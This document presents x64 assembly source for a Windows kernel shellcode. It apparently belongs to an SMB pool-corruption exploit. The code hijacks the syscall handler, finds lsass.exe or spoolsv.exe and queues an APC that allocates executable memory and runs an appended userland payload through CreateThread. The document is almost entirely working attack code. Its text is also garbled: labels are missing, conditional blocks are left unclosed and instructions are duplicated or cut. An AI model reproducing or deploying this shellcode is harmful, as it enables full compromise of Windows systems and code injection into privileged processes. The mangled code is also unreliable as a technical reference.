Windows x64 kernel shellcode from ring 0 to ring 3

The userland shellcode is run in a new thread of a system process.
If the userland shellcode causes any exception, the system process gets killed.
On an idle target with multi-core processors, the hijacked system call might take a while (> 5 minutes) to
get called because system calls are being made on other processors.
The shellcode does not allocate shadow stack where possible, to keep the shellcode size minimal.
This is OK because some Windows functions do not require shadow stack.
When the shellcode is compiled with a specific Windows version macro, the corrupted buffer will be freed.
The userland payload MUST be appended to this shellcode.

Reference: (structures info)

ASM code:


LSASS_EXE_HASH    EQU    0xc1fa6a5a
SPOOLSV_EXE_HASH    EQU    0x3ee083d8
CREATETHREAD_HASH    EQU    0x835e515e

DATA_KAPC_OFFSET            EQU 0x10

section .text
global shellcode_start


    ; IRQL is DISPATCH_LEVEL when got code execution

%ifdef WIN7
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
%elifdef WIN8
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
    push rbp
    call set_rbp_data_address_fn
    ; read current syscall
    mov ecx, 0xc0000082
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    ; save original syscall
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    ; first time on the target
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0

    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    xchg r9, rax
    push rax
    pop rdx     ; mov rdx, rax
    shr rdx, 32
    pop rbp
%ifdef WIN7
    xor eax, eax
%elifdef WIN8
    xor eax, eax

; Find memory address in HAL heap for using as data area
; Return: rbp = data address
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ;   when exploit is rerun before syscall is called
    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
    shr rbp, 12
    shl rbp, 12
    sub rbp, 0x70   ; for KAPC struct too

    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]
    push rax    ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
    call set_rbp_data_address_fn
    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ; restore syscall
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    ; allow interrupts while executing shellcode
    call r3_to_r0_start
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

    ; save used non-volatile registers
    push r15
    push r14
    push rdi
    push rsi
    push rbx
    push rax    ; align stack by 0x10

    ; find nt kernel address
    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc                ; strip to page size
    shl r15, 0xc

    sub r15, 0x1000             ; walk along page size
    cmp word [r15], 0x5a4d      ; 'MZ' header
    jne _x64_find_nt_walk_page
    ; save nt address for using in KernelApcRoutine
    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15

    ; get current EPROCESS and ETHREAD
    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
    call win_api_direct
    xchg rcx, rax       ; rcx = EPROCESS
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; rcx : EPROCESS    
    ; find offset of EPROCESS.ImageFilename
    call get_proc_addr
    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename

    ; find offset of EPROCESS.ThreadListHead
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
%ifdef WIN7
    lea rdx, [rax+0x28]
%elifdef WIN8
    lea rdx, [rax+0x38]
    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead

    ; find offset of ETHREAD.ThreadListEntry
%ifdef COMPACT
    lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
    mov r9, qword [r9]
%ifndef COMPACT
    cmp r8, r9          ; check end of list
    je _insert_queue_apc_done    ; not found !!!
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)

    ; find offset of EPROCESS.ActiveProcessLinks
    call get_proc_addr
    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)

    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
    ; check process name
    lea rsi, [rcx+rbx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
%ifndef COMPACT
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
    jz found_target_process
    ; next process
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop

    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    ; iterate ThreadList until KeInsertQueueApc() success
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead

%ifdef COMPACT
    lea rbx, [rcx + rdx]
    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
    mov rbx, rsi    ; use rbx for iterating thread

    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.

    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]
%ifndef COMPACT
    cmp rsi, rbx
    je _insert_queue_apc_loop   ; skip list head

    ; find start of ETHREAD address
    ; set it to rdx to be used for KeInitializeApc() argument too
    lea rdx, [rbx + r14]    ; ETHREAD
    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
    ; Teb member is next to Queue member.
    call get_proc_addr
    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
    je _insert_queue_apc_loop
    ; KeInitializeApc(PKAPC,
    ;                 PKTHREAD,
    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
    ;                 PKRUNDOWN_ROUTINE = NULL,
    ;                 PKNORMAL_ROUTINE = userland_shellcode,
    ;                 KPROCESSOR_MODE = UserMode (1),
    ;                 PVOID Context);
    lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PAKC
    xor r8, r8      ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
    push rbp    ; context
    push 1      ; UserMode
    push rbp    ; userland shellcode (MUST NOT be NULL)
    push r8     ; NULL
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ;   SystemArgument1 is second argument in usermode code (rdx)
    ;   SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+DATA_KAPC_OFFSET]
    ;xor edx, edx   ; no need to set it here
    ;xor r8, r8     ; no need to set it here
    xor r9, r9
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done
    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r14
    pop r15

; Call function in specific module
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
;                  edi = hash of target function name
    call get_proc_addr
    jmp rax

; Get function address in specific module
; Arguments: r15 = module pointer
;            edi = hash of target function name
; Return: eax = offset
    ; Save registers
    push rbx
    push rcx
    push rsi                ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60]  ; Get PE header e_lfanew
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax                 ; save EAT

    mov ecx, dword [rax+24]  ; NumberOfFunctions
    mov ebx, dword [rax+32]  ; FunctionNames
    add rbx, r15

    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx                     ; decrement NumberOfFunctions
    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
    add rsi, r15                ; Add the modules base address

    call calc_hash

    cmp eax, edi                        ; Compare the hashes
    jnz _get_proc_addr_get_next_func    ; try the next function

    pop rax                     ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15                ; ordinate table virtual address
    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
    mov ebx, dword [rax+28]     ; Get the function addresses table rva
    add rbx, r15                ; Add the modules base address
    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
    add rax, r15                ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx

; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
    push rdx
    xor eax, eax
    lodsb                   ; Read in the next byte of the ASCII string
    ror edx, 13             ; Rotate right our hash value
    add edx, eax            ; Add the next byte of the string
    test eax, eax           ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx

; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
; VOID KernelApcRoutine(
;           IN PKAPC Apc,
;           IN PKNORMAL_ROUTINE *NormalRoutine,
;           IN PVOID *NormalContext,
;           IN PVOID *SystemArgument1,
;           IN PVOID *SystemArgument2)
    push rbp
    push rbx
    push rdi
    push rsi
    push r15
    mov rbp, [r8]       ; *NormalContext is our data area pointer
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    push rdx
    pop rsi     ; mov rsi, rdx
    mov rbx, r9
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    xor eax, eax
    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax      ; baseAddr = 0
    mov ecx, eax
    not rcx             ; ProcessHandle = -1
    mov r8, rax         ; ZeroBits
    mov al, 0x40    ; eax = 0x40
    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
    push rax            ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax       ; RegionSize = 0x1000
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    add rsp, 0x30
%ifndef COMPACT
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
    ; copy userland payload
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x600  ; fix payload size to 1536 bytes
    rep movsb
    ; find CreateThread address (in kernel32.dll)
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    mov rax, [rax + 0x18]       ; PEB->Ldr
    mov rax, [rax + 0x20]       ; InMemoryOrder list

%ifdef COMPACT
    mov rsi, [rax]      ; first one always be executable, skip it
    lodsq               ; skip ntdll.dll
    mov rax, [rax]       ; first one always be executable
    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
    ; offset 0x50  => is name
    ; offset 0x20  => is dllbase
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop
    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
    jnz _find_kernel32_dll_loop

    mov r15, [rax+0x20]
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [rbx], rax
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
    ; restore IRQL to APC_LEVEL
    mov cl, 1
    mov cr8, rcx
    pop r15
    pop rsi
    pop rdi
    pop rbx
    pop rbp

    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30

